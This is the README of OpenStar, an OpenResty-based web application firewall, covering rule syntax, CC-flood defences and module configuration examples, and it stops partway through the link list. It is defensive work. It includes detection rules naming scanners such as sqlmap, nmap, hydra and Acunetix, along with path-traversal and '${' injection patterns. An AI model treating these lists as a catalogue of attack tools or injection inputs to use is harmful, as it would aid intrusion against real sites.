--- title: OpenStar(开心)说明 tags: OpenResty,OpenStar,waf+,云waf,nginx lua grammar_cjkRuby: true --- 欢迎使用 **{OpenStar}(WAF+)**,该项目是从实际需求中产生,经过多次的版本迭代,实属不易。感谢**春哥**,以及[春哥][1]的神器(**[OpenResty][2]**) 注意:使用版本一定要大于 1.11.0 因为使用了ngx.var.request_id **代码写的比较好理解,肯定不优雅 哈~** 个人的一些开发实践,有需要的朋友可以加入下 ![xq][27] 正在更新说明WIKI篇,已经更新了安装篇,请自行查阅。 更新:规则支持方式 ``` 支持并行正则匹配(使用 https://github.com/cloudflare/lua-aho-corasick 实现) 增加:并行正则("aho") -- 列表 "host":[[ "^www.baidu", ".*.baidu.com$" ], "aho" ] ``` 更新:规则支持方式 ``` 现有:等于("") 包含("in") 列表("list") 字典("dict") 正则("jio|jo|***") 增加:开头列表("start_list") -- 以什么什么开头列表 不区分大小写 开头列表("ustart_list") 结尾列表("end_list") -- 以什么什么结尾列表 不区分大小写 结尾列表("uend_list") 包含列表("in_list") -- 包含的列表形式 不区分大小写包含列表("uin_list") --in_list扩展(不区分大小写) 【json 同 list 一样】 增加:长度("len") [Min,Max] 表示大于等于 Min,且小于等于 Max EG: "host":[[ "www.baidu.", "img.baidu." ], "start_list" ] "referer":[[0,150],"len"] --- referer 长度 在 0~150 之间 ``` # 非开源版本 【带后台、带 4 层防护模块等...】完全免费!!! https://www.kancloud.cn/openstar/install/1136671 # 变更历史 ## 1.7 更新二阶匹配规则支持取反,动作取消next等 原二阶规则:["baidu","in"],支持取反后:["baidu","in",true];最后的默认是nil也就是false,不取反的意思,所以规则基本可以之间复用,动作为next的需要修改一下即可 ## 1.7.1.11 更新规则匹配等于判断表达式支持("="),post_form支持("*")对所有表单名称进行匹配 ``` ["post_form",["(;|-|/)","jio",["*",2],false]] 对表单所有名称的文件名进行匹配 ["www.test.com",""] ["www.test.com","="] 新增加表达方式 ``` ## 1.7.1.10 更新支持基于业务属性进行限速的功能 network_Mod: `"network":{"maxReqs":30,"pTime":10,"blackTime":600,"guid":"cookie_userguid"}`,业务代码ngx.var[%guid%],实际上是从ngx.var中去值进行限速操作,所以一定要配置正常;这里表示从cookie中名称为userguid的值进行频率统计来限速。默认则是用ip限速 ### 1.7.1.1 修改 host_Mod 规则匹配 目前只有两种规则(app_ext | network) 请参考 conf_json/host_json/101.200.122.200.json ### 1.7.0.24 原规则匹配变更:table-->list;list-->dict 方便理解list表示序列,dict表示字典。 EG: ``` "method":[ { "POST":true, "GET":true }, "dict" --- 原 list ] "ips": [[ "101.254.241.149", "106.37.236.170"], "list" --- 原 table ] ``` ## 1.6 更新计数count_dict到DB 2,key也进行分开,优化规则缓存 规则进行了缓存,大幅提高性能,json文件保存进行了美化等...... ## 1.5 应一些朋友强烈要求增加Master/Slave模式 主:定时将内存中的配置推送到redis, 从:定时从redis拉取数据到内存后,并保存到文件 ## 1.4 更新命名相关,以多规则匹配 原来url改成uri,args改成query_string,修改的比较多,还有增加app_Mod实现多规则匹配,连接符支持OR ## 1.3 更新跳转功能,可配置进行set-cookie操作 可以配置某一个或者多个url使用跳转set-cookie操作。cookie是无状态的。 ## 1.2 更新支持拦截外部的csrf 在referer_Mod处,增加action,`allow`表示允许且后续的规则不用在匹配(一般是静态资源如图片/js/css等),`next`表示白名单匹配成功后,会继续后面的规则匹配(这里就用于拦截外部的CSRF)增加`next`是因为原来代码中,若配置了防护站外的CSRF,后续的规则会bypass,所以增加的,这样就不会出现一些绕过问题。 **后续的action理论上都支持该语法** ## 1.1 增加app_Mod,丰富allow动作(ip) 网站的某个目录进行IP白名单的访问控制(后台、phpmyadmin等) ## 0.9 - 1.0 修改了大量全局函数 在学习完[OpenResty最佳实践][7]后,代码太不专业,修改了大量全局变量、函数 ## 0.8 优化一下算法 原来args是遍历每个参数在连接起来,感觉性能有时有点瓶颈,就使用新api取出url中的所有参数,经过测试效果要比原来好很多。 ## 0.7 增加集群版本 当时大约有2-4台OpenStar服务器用于安全防护,通过脚本进行统一管理的,没有进行真正的统一管理,所以抽空的时候把redis用上。 ## 0.6 增加API相关操作 因为是个蹩脚的程序员(没办法,搞安全的现在都被逼的写代码了;感谢春哥,我在写的过程中非常的快乐,所以就把项目叫做OpenStar[开心],请勿见笑了)、前端界面我迟迟没有想好,所以先把一下操作的API封装了,也满足当时公司脚本化需求。 ## 0.4-0.5 增加配置文件操作 刚开始都是写在lua代码中,随着功能增加,决定通过配置文件进行操作,所有就使用json方式进行定义配置文件。 ## 0.3 增加waf防护模块 随着cc防护成功后,我陆续增加了waf相关的功能,规则参考了[modsecurity][8]、[loveshell][9]防护模块、以及互联网搜集的一些过滤点 ## 0.2 CC防护应用层版 通过网络层+应用层的防护后,我后续增加了应用层的安全防护,如应用层set cookie、url跳转、js跳转等这样应用层的防护模块 ## 0.1 CC防护版 当时是为了解决公司的CC攻击,由于一些硬件抗D设备在新的网络环境下(有CDN网络下)无法获取用户真实IP头,我才动手将第一个版本完成,当时功能就是有通过自定义HTTP头获取用户真实ip进行访问频率的限制。(OpenStar可以根据某个url进行频率限制,不仅仅是整个网站的[排除静态文件,如设置了referer\_Mod 或者 url\_Mod 中资源的allow操作]) # TOP [安装篇][3] [基础配置说明][4] base.json [STEP 0:realIpFrom_Mod][10] [STEP 1:ip_Mod][11] [STEP 2:host_method_Mod][12] [STEP 3:rewrite_Mod][13] [STEP 4:host_Mod][14] [STEP 5:app_Mod][15] [STEP 6:referer_Mod][16] [STEP 7:uri_Mod][17] [STEP 8:header_Mod][18] [STEP 9:useragent_Mod][19] [STEP 10:cookie_Mod][20] [STEP 11:args_Mod][21] [STEP 12:post_Mod][22] [STEP 13:network_Mod][23] [STEP 14:replace_Mod][24] 一些同学问的比较多的问题: 0:规则组问题 支持IFTTT模式,如条件是(referer中包含baidu 或者 cookie中不包含abc 且useragent正则匹配spider)等等这样复杂的表达式,执行动作也是有多个可以使用(deny allow log refile rehtml relua*)可以定制各种复杂的场景 1:关于多站点的事 使用ngx本身的增加配置文件就不说了,使用动态upstream可以参考我另外的项目https://github.com/starjun/dynamic_upstream-by-balancer 一些接口没有加上去,看看代码自己非常容易搞定了。反向代理的host和后端的IP组都在DICT中(注意是IP组,而不仅仅是类似一些balancer写动态upstream的是一个IP),且支持多种负载均衡方式,相信可以满足大多数需求。https的后面有时间我在完善下。 2:集群相关(提供了Master/Slave配置) 目前openstar是支持集群的,规则同步和下发等都是提供了api,都是被动方式,规则为什么没有放到redis中,请自己测试一下,每次规则过滤都从redis取后在序列化,和从dict取在序列化,自己动手测试看性能,顺便说下,规则在集群下当然存在redis中,都是通过api进行操作更新到dict中,而不是每次都从redis中取,且最近增加了定时从redis拉取配置功能(测试中...) 3:如有一些技术类问题,请尽量完整一些,包括ngx配置文件,和比较完整的代码,不然真心不好作答,有时间我会尽量回复(不一定是对的),没时间回复的请谅解。 [email protected]邮箱已经没有在用了,请不要给这个发邮箱啦。 ## TODO ## 无 商业版说明: **支持域名管理,支持geoip(按国家,城市进行拦截等),支持SQL语义分析(功能完善中),更强大的api接口,默认规则更强大等等** ---------- CC防护、防抓取、刷单等防护算法: CC攻击点: a:用户可直接访问的url(搜索请求[数据库查询],高计算[cpu计算],随机url[耗连接]等) b:嵌入类型的url(嵌入的验证码url[CPU计算]、ajax判断用户是否存在的url[数据库查询]等) c:非浏览器类型的接口(一些公共API、WEBservice等无SDK的接口) d:特定语言、服务器的攻击(php dos、慢速攻击等) 我提供的防护算法是用于防护a、b类型的攻击,a类型防护启用时,可以先生成一个添加标记的跳转页面,b类型防护启用时,动态对其渲染页面进行标记的添加,c类型有sdk,自己写代码支持自己设定的防护算法的不是问题。 js静态、动态验证: 跳转页面/渲染页面对下一次请求的url进行标记增加(openstar已经实现的增加url尾巴),增加一个get的args参数,参数名称和值都是由服务器产生或者前端页面js产生,如对下一次请求的url增加`cc=1ldldj`这个尾巴,服务端判断合法性有静态的正则判断值的合法性,有动态的判断值是否由服务器生成的,合法性检查更加严格。 js增强:(获取鼠标轨迹、鼠标点击事件、随机延迟、基于特定浏览器对js的方言) 普通的js一些攻击软件或者爬虫工具是可以分析执行的,故可以进行js增加,如判断鼠标轨迹、鼠标点击事件这些事件判断失败就不会进行下一步请求;如基于浏览器的js方言,一些浏览器会有自己的方言,那些爬虫工具和攻击工具是不可能解析js方言的,就不会进行下一步请求;还有使用js随机延迟函数,用于下一次请求的时间分流,这样请求频率就会被分开,这样就缓解了请求频率,以及结合鼠标轨迹和鼠标事件判断,可以很好的识别工具和人。 浏览器指纹:(对浏览器会生成一个唯一指纹,从而判断链式请求指纹的一致性) 广告厂商来做这件事就事半功倍了,毕竟浏览器指纹在整个互联网的数据还是很有参考价值的,毕竟不是要指纹对应的广告标签等这些商业价值数据,仅是需要一个指纹的信誉库(同IP信誉库类似,当然也有时效性),因为CC攻击和一些爬虫、刷单工具在互联网上的指纹还是非常清晰的。 情况可以公司可以建立自己的体系,对CC攻击、页面抓取、刷单是有相当大的帮助的,以后各大公司可以共享这些浏览器指纹数据,组成一个联盟也行,从而判断该指纹是否是真实用户等一些可用数据。 http://123.57.220.116/fgjs2.html 看看自己的浏览器指纹吧(如果访问不了,哈,我买的ECS过期了!) 参考:https://github.com/Valve/fingerprintjs2 控件/浏览器防护: 使用js进行下一次请求的跳转,以及增强的鼠标轨迹、鼠标事件、浏览器js方言等这些判断还是有一定的缺陷,故可以直接使用控件方式、或者和浏览器合作(浏览器支持这种防护标记) ``` PS:简单举个例子 http://www.cc.com?cc=@{"api":"http://1.1.1.1/cc/api","key":"iodjdjkdldskl"}@ http://www.cc.com?cc=@{"api":"tcp://1.1.1.1:908","key":"iodjdjkdldskl"}@ http://www.cc.com?cc=@{"api":"local","key":"1:2345:44"}@ 跳转页面或者渲染页面,控件/浏览器是可以识别@中间的内容的,向这个api使用key取到一个值,下一次请求带上这个值。 ``` i:set 一个cookie,其合法性是由控件和web服务器双向约定或加密产生,从而判断下一次请求是否合法 ii:增加args参数尾巴,其value值合法性由控件和web服务器双向约定或加密产生,从而判断下一次请求是否合法 iii:增加POST参数,其value值合法性由控件和web服务器双向约定或加密产生,等等对下一次请求进行验证增加 ## 重点 ## 这些防护算法我正在申请相关专利,个人用户以后永久免费的,仅对企业收费,请抄袭党,无耻公司放过小弟一码。 这些防护算法我正在申请相关专利,个人用户以后永久免费的,仅对企业收费,请抄袭党,无耻公司放过小弟一码。 这些防护算法我正在申请相关专利,个人用户以后永久免费的,仅对企业收费,请抄袭党,无耻公司放过小弟一码。 # 概览 ---------- **OpenStar**是一个基于[OpenResty][2]的,高性能WAF,还相应增加了其他灵活、友好、实用的功能,是增强的WAF。 **app_Mod 支持规则组 连接符支持 or , 参考doc/demo.md文档** # WAF防护 ---------- 在**OpenStar**中的WAF防护模块,采用传统的字符串的匹配如正则过滤、包含等(*有人会问现在不是流行自主学习么;正则、包含等会有盲点、会被绕过;WAF的误报和漏报问题等等......*)。**规则不是万能的,但是没有规则是万万不能的** 这里我简单说明一下,自主分析学习引擎是我们的日志分析引擎做的(预留了api可实时增加拦截),这里是高性能、高并发的点,就用简单快速的方法解决,且根据业务实际调整好防护策略,可以解决绝大多数WEB安全1.0和WEB安全2.0类型的漏洞(90%+的问题)。 WAF 防护从header,args,post,访问频率等,分层进行按顺序防护,详细在后面的功能会详细说明 - **WEB安全1.0** 在1.0时代下,攻击是通过服务器漏洞(IIS6溢出等)、WEB应用漏洞(SQL注入、文件上传、命令执行、文件包含等)属于服务器类的攻击,该类型漏洞虽然经历了这么多年,很遗憾,此类漏洞还是存在,并且重复在犯相同的错误。 - **WEB安全2.0** 随着社交网络的兴起,原来不被重视的XSS、CSRF等漏洞逐渐进入人们的视野,那么在2.0时代,漏洞利用的思想将更重要,发挥你的想象,可以有太多可能。 - **WEB安全3.0** 同开发设计模式类似(界面、业务逻辑、数据),3.0将关注应用本身的业务逻辑和数据安全,如密码修改绕过、二级密码绕过、支付类漏洞、刷钱等类型的漏洞,故注重的是产品本身的业务安全、数据安全、风控安全等。 > `安全不仅仅是在技术层面、还应该在行政管理层面、物理层面去做好安全的防护,才能提供最大限度的保护。` > 安全行业多年的从业经验:人,才是最大的威胁;无论是外部、内部、无心、有意过失。(没有丑女人、只有懒女人)我想可以套用在此处,纯属个人见解。 # CC/采集防护 什么是**CC攻击**,简单的说一下,就是用较少的代价恶意请求web(应用)中的重资源消耗点(CPU/IO/数据库等等)从而达到拒绝服务的目的;**数据采集**,就是内容抓取了,简单这么理解吧 > `非官方学术类的解释,先将就理解下` **关于本文对CC攻击的分析和相关的防护算法,都是我在实战中分析总结,并形成自己的方法论,不足之处、欢迎指正。** ## 攻击类型 - 行为(GET、POST等) 目前主要还是这两中method攻击为主,其他的少之又少。 - 被攻击的点 1:用户可直接访问的URL(搜索、重CPU计算、IO、数据库操作等) 2:嵌入的URL(验证码、ajax接口等) 3:面向非浏览器的接口(一些API、WEBservice等) 4:基于特定web服务、语言等的特定攻击(慢速攻击、PHP-dos等) > `面对CC攻击我们需要根据实际情况采用不同的防护算法,比如攻击的点是一个ajax点,你使用js跳转/验证码肯定就有问题` ## 防护方法 - 网络层 通过访问ip的频率、统计等使用阀值的方式进行频率和次数的限制,黑名单方式 - 网络层+应用层 在后来的互联网网络下,有了的CDN加入,现在增加的网络层的防护需要扩展,那么统计的IP将是在HTTP头中的IP,仍然使用频率、次数、黑名单的方式操作。 > `但是很多厂家的硬件流量清洗等设备,有的获取用户真实IP从HTTP头中取的是固定字段(X-FOR-F),不能自定义,更甚至有的厂家就没有该功能,这里就不说具体的这些厂家名字了`PS: 在传统的4层防护上,是没有问题的 - 应用层 TAG验证、SET COOKIE、URL跳转、JS跳转、验证码、页面嵌套、强制静态缓存等 防护是需要根据攻击点进行分别防护的,如攻击的是嵌入的url,我们就不能使用JS跳转、302验证码等这样的方法;**在多次的CC防护实战中,如使用url跳转、set cookie,在新型的CC攻击下,这些防护都已经失效了**。后面我会分享一下我的防护算法,并且在**OpenStar**中已经可以根据情况实现我所说的防护算法。 浏览器是可以执行JS和flash的,这里我分享一些基于JS的防护算法,flash需要自己去写(比js复杂一些),可以实现flash应用层的安全防护和防页面抓取(开动你的大脑吧) 1:客户端防护 使用JS进行前端的防护(浏览器识别、鼠标轨迹判断、url有规则添加尾巴(args参数)、随机延迟、鼠标键盘事件获取等)其实这里非常复杂,如浏览器的识别 ie 支持 `!-[1,]` 这个特殊JS,一些JS方言,一些浏览器有自定义标签等等; 2:服务端防护 url添加的尾巴(args参数)是服务器动态生成的token,而不是使用静态的正则去匹配其合法性。 3:特定攻击 该类特定攻击,可以通过特征快速匹配出来(慢速攻击、PHP5.3的http头攻击) **简单场景** 1:用户可直接访问的url(这种是最好防的) 第一阶段: - 网络层:访问频率限制,超出阀值仅黑名单一段时间 - 应用层:js跳转、验证码、flash策略(拖动识别等) 2:嵌入的url(ajax校验点、图片验证码) 第一阶段: - 网络层:访问频率限制,超出阀值仅黑名单一段时间 - 应用层:载入被攻击的url页面,重写页面,使用js方操作链接被攻击的url。js随机在url尾巴增加有一定规则的校验串,服务端对串进行静态正则校验。 第二阶段: - 网络层+应用层:用户ip在http头中,需要从http头取ip,在进行频率限制 (其实做好了,这一层的防护,基本不用进入第三阶段的应用层防护了) - 应用层:校验串使用服务端生成的token,进行严格服务器token验证检查 第三阶段: - 应用层:js增加浏览器识别(不同agent匹配不同JS方言代码)、JS随机延迟、鼠标轨迹验证、键盘鼠标事件验证等js增加验证后,在进行校验串生成。 说明:多次实战CC处理经验,很少到第三阶段,当然储备好这些JS脚本非常重要,纯JS肯定也是有限的,所有我就提出了使用控件,甚至是和浏览器厂商合作等更精准的防护方法。这样对CC攻击、页面抓取、刷单等有非常好的防护效果。 > 应用层的防护是在网络层+扩展的网络层防护效果不佳时使用,一般情况基本用的不多,因为在OpenStar的防护下,极少数情况下,需要第三阶段防护。在防页面抓取时,发挥你的想象(js是个好帮手,善用)使用OpenStar就可以帮你快速实现;当然使用flash防抓取效果更好(不够灵活)。 # 目录 后续更新!~ # 下载 wget git clone **已经打包的一些脚本,请参考bash目录** # 安装 - 安装OpenResty 这里不做过多重复描述,直接看链接[OpenResty][2] - 配置nginx.conf 在http节点,引用waf.conf。注:原ngx相关配置基本不用修改,该优化优化、该做CPU亲缘绑定继续、该动静分离还继续、该IO、TIME等优化继续不要停。 - 配置waf.conf 修改lua\_package\_path,使用正确的路径即可;修改那些lua文件的路径,多检查几遍。 - 设置目录权限 OpenStar目录建议放到OR下,方便操作,该目录ngx运行用户有读写执行权限即可。因为要写日志,*暂时没有用ngx.log,后续可能会改动*。 - lua文件修改 在init.lua中,修改conf_json参数,base.json文件绝对路径根据自己的情况写正确。 - api使用 2016年6月7日 23:31:09 更新啦,引用waf.conf,后就可以直接使用api接口了,通过监听5460端口来给管理用啦,界面也在筹划中,期待有人可以加入,帮我一起整界面。 **已经打包的一些脚本,请参考bash目录,运行前请阅读一下,感谢好友余总帮助写的脚本** # 使用 ## 配置规则 一般情况下匹配某一规则由3个参数组成,第二个参数标识第一个参数类型,第三个参数表示是否取反,默认为`nil` 即 `false` 表示不取反 hostname:`["*",""]` = `["*","",false]` ==>表示匹配所有域名(使用字符串匹配,非正则,非常快) hostname:`["*\\.game\\.com","jio"]` ==>表示使用正则匹配host(**ngx.re.find($host,参数1,参数2)**) hostname:`[["127.0.0.1","127.0.0.1:8080"],"list"]` ==>表示匹配参数1 列表 中所有host hostname:`[{"127.0.0.1":true,"127.0.0.1:5460":true},"dict"]` ==>表示匹配 字典 中host为true的host uri:`["/admin","in"]` ==>表示匹配uri中包含/admin的所有uri都会被匹配(**string.find($uri,参数1,1,true)**) ip:`[["127.0.0.1/32",""113.45.199.0/24""],"cidr"]` ==>表示匹配的ip在这两组ip段/ip中 args:`["*","",["args_name","all"],false]` args:`["*","",["args_name","end"]]` = `["*","",["args_name","end"],false]` args:`["*","",["args_name",1]]` 说明:第3个参数表示取args参数table的key名称,第3个参数[2]表示取args[args_name]为table时,匹配任意(all),匹配最后一个(end),匹配第几个(数字),默认取第一个 ==>表示匹配的GET的args参数名为args_name,使用第4个参数模式进行匹配,匹配规则就是第一个和二个参数。其中第1、2参数支持前面描述的规则方式。 **table类型的匹配规则比较麻烦,暂时想着是这样处理,有好的想法可以告诉我** ## 执行流程 ![enter description here][5] - init阶段 a:首先加载本地的base.json配置文件,将相关配置读取到config\_dict,host\_dict,ip\_dict中 - access阶段(自上到下的执行流程,规则列表也是自上到下按循序执行的) 0:realIpFrom_Mod ==> 获取用户真实IP(从HTTP头获取,如设置) 1:ip_Mod ==> 请求ip的黑/白名单、log记录 2:host\_method\_Mod ==> host和method过滤(白名单) 3:rewrite_Mod ==> 跳转模块,set-cookie操作 4:host_Mod ==> 对应host执行的规则过滤(uri,referer,useragent等) 这里是产品中提供给独立用户使用的过滤规则。目前支持自定义规则组(任意参数,任意组合) 5:app_Mod ==> 用户自定义应用层过滤 6:referer_Mod ==> referer过滤(黑/白名单、log记录) 7:uri_Mod ==> uri过滤(黑/白名单、log记录) 8:header_Mod ==> header过滤(黑名单) 9:useragent_Mod ==> useragent过滤(黑/白名单、log记录) 10:cookie_Mod ==> cookie过滤(黑/白名单、log记录) 11:args\_Mod ==> args参数过滤[实际是query_string](黑/白名单、log记录) 12:post_Mod ==> post参数过滤[实际是整个post内容](黑/白名单、log记录) 13:network_Mod ==> 应用层网络频率限制(频率黑名单) - body阶段 14:replace\_Mod ==> 内容替换规则(动态进行内容替换,性能消耗较高慎用,可以的话用app\_Mod中rehtml、refile这2个自定义action) ## <span id = "step0">STEP 0 : realIpFrom_Mod </span> - 说明: `{"101.200.122.200:5460": {"ips": ["*",""],"realipset": "x-for-f"}}` 通过上面的例子,表示域名id.game.com,从ips来的直连ip,用户真实ip在x-for-f中,ips是支持二阶匹配,可以参考例子进行设置,ips为\*时,表示不区分直连ip了。 ## STEP 1:ip_Mod(黑/白名单、log记录) - 说明: `{"ip":"111.206.199.61","action":"allow"}` `{"ip":"www.game.com-111.206.199.1","action":"deny"}` 上面的例子,表示ip为111.206.199.61(从http头获取,如设置)白名单 action可以取值[allow、deny],deny表示黑名单;第二个就表示对应host的ip黑/白名单,其他host不受影响。 [返回](#top) ## <span id = "step2">STEP 2:host\_method\_Mod(白名单)</span> - 说明: `{"state":"on","method":[["GET","POST"],"list"],"hostname":[["id.game.com","127.0.0.1"],"list"]}` 上面的例子表示,规则开启,host为id\.game\.com、127.0.0.1允许的method是GET和POST state:表示规则是否开启 method:表示允许的method,参数2标识参数1是字符串、列表(list)、正则、字典(dict) hostname:表示匹配的host,规则同上 > **`"method": [["GET","POST"],"list"]`==> 表示匹配的method是GET和POST** > **`"method": ["^(get|post)$","jio"]` ==> 表示匹配method是正则匹配** > **`"hostname": ["*",""]` ==>表示匹配任意host(字符串匹配,非正则,非常快)** > **后面的很多规则都是使用该方式匹配的** [返回](#top) ## STEP 3: rewrite_Mod(跳转模块) - 说明: ``` { "state": "on", "action": ["set-cookie"], "set_cookie":["asjldisdafpopliu8909jk34jk","token_name"], "hostname": ["101.200.122.200",""], "uri": ["^/rewrite$","jio"] } ``` 上面的例子表示规则启用,host为101.200.122.200,且url匹配成功的进行302/307跳转,同时设置一个无状态cookie,名称是token。action中第二个参数是用户ip+和改参数进行md5计算的。请自行使用一个无意义字符串。防止攻击者猜测出生成算法。 [返回](#top) ## STEP 4:host_Mod - 说明: 该模块是匹配对应host进行规则匹配,在conf_json/host_json/目录下,本地的基于host的匹配规则 支持host.state状态支持[on log off],log即表示原匹配被拦截将失效,off表示不做任何规则的过滤 ## <span id = "step5">STEP 5:app_Mod(自定义action)</span> - 说明: ``` { "state":"on", "action":["deny"], "hostname":["127.0.0.1",""], "uri":["^/([\w]{4}\.html|deny1\.do|你好\.html)$","jio"] } ``` 上面的例子表示规则启用,host为127.0.0.1,且url符合正则匹配的,拒绝访问 state:规则是否启用 action:执行动作 1:deny ==> 拒绝访问 2:allow ==> 允许访问 3:log ==> 仅记录日志 4:rehtml ==> 表示返回自定义字符串 5:refile ==> 表示返回自定义文件(文件内容返回) 6:relua ==> 表示返回lua执行脚本(使用dofile操作) 7:relua_str ==> 表示返回lua代码执行 hostname:匹配的host uri:匹配的uri > **hostname 和 uri 使用上面描述过的匹配规则,参数2标记、参数1内容** > **详细参见项目中的demo规则,多实验、多测试就知道效果了** > **各种高级功能基本就靠这个模块来实现了,需要你发挥想象** [返回](#top) ## STEP 6:referer_Mod(白名单) - 说明: `{"state":"on","uri":["\\.(gif|jpg|png|jpeg|bmp|ico)$","jio"],"hostname":["127.0.0.1",""],"referer":["*",""],"action":"allow"}` 上面的例子表示,host为127.0.0.1,uri配置的正则成功,referer正则匹配成功就放行**【这里把一些图片等静态资源可以放到这里,因为使用OpenStar,不需要将access_by_lua_file 专门放到nginx的不同的location动态节点去,这样后续的匹配规则就不对这些静态资源进行匹配了,减少总体的匹配次数,提高效率】**,action表示执行的动作,`allow`表示规则匹配成功后,跳出后续所有规则(一般对静态资源图片),referer匹配失败就拒绝访问(白名单),防盗链为主;规则的取反可以设置防护站外的CSRF state:表示规则是否开启 uri:表示匹配的uri hostname:匹配host referer:匹配referer action:匹配动作 > referer的匹配是白名单,注意一下即可 > 这些匹配都是基于上面说过的二阶匹配法 [返回](#top) ## STEP 7:uri_Mod(黑、白名单) - 说明: `{"state":"on","hostname":["\*",""],"uri":["\\.(css|js|flv|swf|zip|txt)$","jio"],"action":"allow"}` 上面的例子表示,规则启用,任意host,uri正则匹配成功后放行,不进行后续规则匹配(该场景同图片等静态资源一样进行放行,减少后续的匹配) state:表示规则是否开启 hostname:表示匹配的host uri:表示匹配uri action:可取值[allow、deny、log],表示匹配成功后的执行动作 > 一般情况下,过滤完静态资源后,剩下的都是拒绝一下uri的访问如.svn等一些敏感目录或文件 [返回](#top) ## STEP 8:header_Mod(黑名单) - 说明: `{"state":"on","uri":["\*",""],"hostname":["\*",""],"header":["Acunetix_Aspect","\*",""]}` 上面的例子表示,规则启用,匹配任意host,任意uri,header中Acunetix_Aspect内容的匹配(本次匹配任意内容)这个匹配是一些扫描器过滤,该规则是wvs扫描器的特征 state:规则是否启用 uri:匹配uri hostname:匹配host header:匹配header头 [返回](#top) ## STEP 9:useragent_Mod (黑名单) - 说明: `{"state":"off","action":"deny","useragent":["HTTrack|harvest|audit|dirbuster|pangolin|nmap|sqln|-scan|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|PycURL|zmeu|BabyKrokodil|netsparker|httperf|bench","jio"],"hostname":[["127.0.0.1:8080","127.0.0.1"],"list"]}` 上面的例子表示,规则关闭,匹配host为127.0.0.1 或者 127.0.0.1:8080 ,useragent正则匹配,匹配成功则拒绝访问,一般host设置为:`"hostname":["*",""]`表示所有(字符串匹配,非常快) state:规则是否启用 hostname:匹配host useragent:匹配agent action:匹配动作 [返回](#top) ## STEP 10:cookie_Mod(黑名单) - 说明: `{"state":"on","cookie":["\\.\\./","jio"],"hostname":["*",""],"action":"deny"}` 上面的例子表示,规则启用,匹配任意host,cookies匹配正则,匹配成功则执行拒绝访问操作 state:表示规则是否启用 cookie:表示匹配cookie hostname:表示匹配host action:可选参数[deny、allow] 表示执行动作 > action后续可以能增加其他action,所以预留在这,否则黑名单根本不需要action参数 [返回](#top) ## STEP 11:args_Mod(黑名单) - 说明: `{"state":"on","hostname":["*",""],"args_data":["\\:\\$","jio"],"action":"deny"}` 上面例子表示,规则启用,匹配任意host,query_string参数组匹配正则,成功则执行拒绝访问动作 state:表示规则是否启用 hostname:表示匹配host query_string:表示匹配args参数组 action:表示匹配成功拒绝访问 [返回](#top) ## STEP 12:post_Mod(黑名单) - 说明: `{"state":"on","hostname":["*",""],"posts_data":["\\$\\{","jio"],"action":"deny"}` 上面的例子表示,规则启用,匹配任意host,post_str参数组匹配正则,成功则拒绝访问 state:表示是否启用规则 hostname:匹配host post_str:匹配post参数组 action:匹配成功后拒绝访问 [返回](#top) ## STEP 13:network_Mod(频率黑名单) - 说明: `{"state":"on","network":{"maxReqs":20,"pTime":10,"blackTime":600},"hostname":["id.game.com",""],"uri":["^/2.html$","jio"]}` 上面的例子表示,规则启用,host为id.game.com,url匹配正则,匹配成功则进行访问频率限制,在10秒内访问次数超过20次,请求的IP到IP黑名单中10分钟(60秒\*10) state:表示是否启用规则 hostname:表示匹配host uri:表示匹配uri network:maxReqs ==> 请求次数;pTime ==> 单位时间;blacktime ==> ip黑名单时长 > 一般情况下,cc攻击的点一个网站只有为数不多的地方是容易被攻击的点,所以设计时,考虑增加通过url细化匹配。 [返回](#top) ## STEP 14:replace_Mod(内容替换) - 说明: `{"state":"on","uri":["^/$","jio"],"hostname":["passport.game.com",""],"replace_list":[["联合","","联合FUCK"],["登录","","登录POSS"],["lzcaptcha\\?key='\\s\*\\+ key","jio","lzcaptcha?keY='+key+'&keytoken=@token@'"]]}` 上面的例子表示,规则启用,host为passport.game.com,url是正则匹配,匹配成功则进行返回内容替换 1:将"联合"替换为"联合FUCK"; 2:将"登录"替换为"登录POSS"; 3:通过正则进行匹配(`ngx.re.gsub`)其中@token@表示动态替换为服务器生成的一个唯一随机字符串 state:表示是否启用规则 hostname:表示匹配的host uri:表示匹配的uri replace_list:表示替换列表,参数1 ==> 被替换内容;参数2 ==> 匹配模式(正则、字符串)如例子中前2个替换列表就是字符串匹配,使用""即可,不能没有;参数3 ==> 被替换的内容 # API相关 参考doc目录下的api.md说明 # 样例 - 参见doc下,demo.md说明 # 性能评测 **操作系统信息** OpenStar测试服务器: ``` 微软虚机,内网测试 uname -a : Linux dpicsvr01 4.2.0-30-generic #36-Ubuntu SMP Fri Feb 26 00:58:07 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux 内存: cat /proc/meminfo | grep MemTotal MemTotal: 14360276 kB// 14GB CPU型号:cat /proc/cpuinfo | grep 'model name' |uniq Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz CPU核数:cat /proc/cpuinfo | grep "cpu cores" | uniq 4 CPU个数:cat /proc/cpuinfo | grep "physical id" | uniq | wc -l 1 ab: ab -c 1000 -n 100000 "http://10.0.0.4/test/a?a=b&c=d" ``` 测试结果: ![enter description here][6] 通过图片可以看到,关闭所有规则,做了2组测试,取最高的`8542`; 启用规则(排除app,network,replace),测试结果`8388`,性能下降`1.81%`; 启用规则(排除replace,app中未启用relua这个高消耗点),测试结果`7959`,性能下降`6.83%`; 启用规则(排除useragent,ab工具默认被拦截了,第二个测试就不完全了。)测试结果`7116`,性能下降`16%`; 总的来说,启用规则后,性能损失可以接受,根据自身的业务进行调整,还可以有所优化。 # 404StarLink 2.0 - Galaxy openstar 是 404Team 星链计划2.0 中的一环,如果对 openstar 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。 https://github.com/knownsec/404StarLink2.0-Galaxy#community ![404log][25] openstar has joined 404Team [404StarLink 2.0 - Galaxy][26] # 关于 - 关于该项目前面其实已经说了不少,从无到有基本都说了,强调下,感谢春哥,[loveshell][9]!!! - 关于我:从事安全、架构相关工作。 - Copyright and License GPL(GNU General Public License) Copyright (C) 2011-2016, by zj [1]: https://github.com/agentzh [2]: http://openresty.org/cn/ [3]: https://github.com/starjun/openstar/wiki/%E5%AE%89%E8%A3%85%E7%AF%87 [4]: https://github.com/starjun/openstar/wiki/base.json [5]: ./doc/Openstar.jpg "OpenStar.jpg" [6]: ./doc/test.png "test.png" [7]: https://moonbingbing.gitbooks.io/openresty-best-practices/content/index.html [8]: http://www.modsecurity.org/ [9]: https://github.com/loveshell/ngx_lua_waf [10]: https://github.com/starjun/openstar/wiki/0-realIpFrom_Mod [11]: https://github.com/starjun/openstar/wiki/1-ip_Mod [12]: 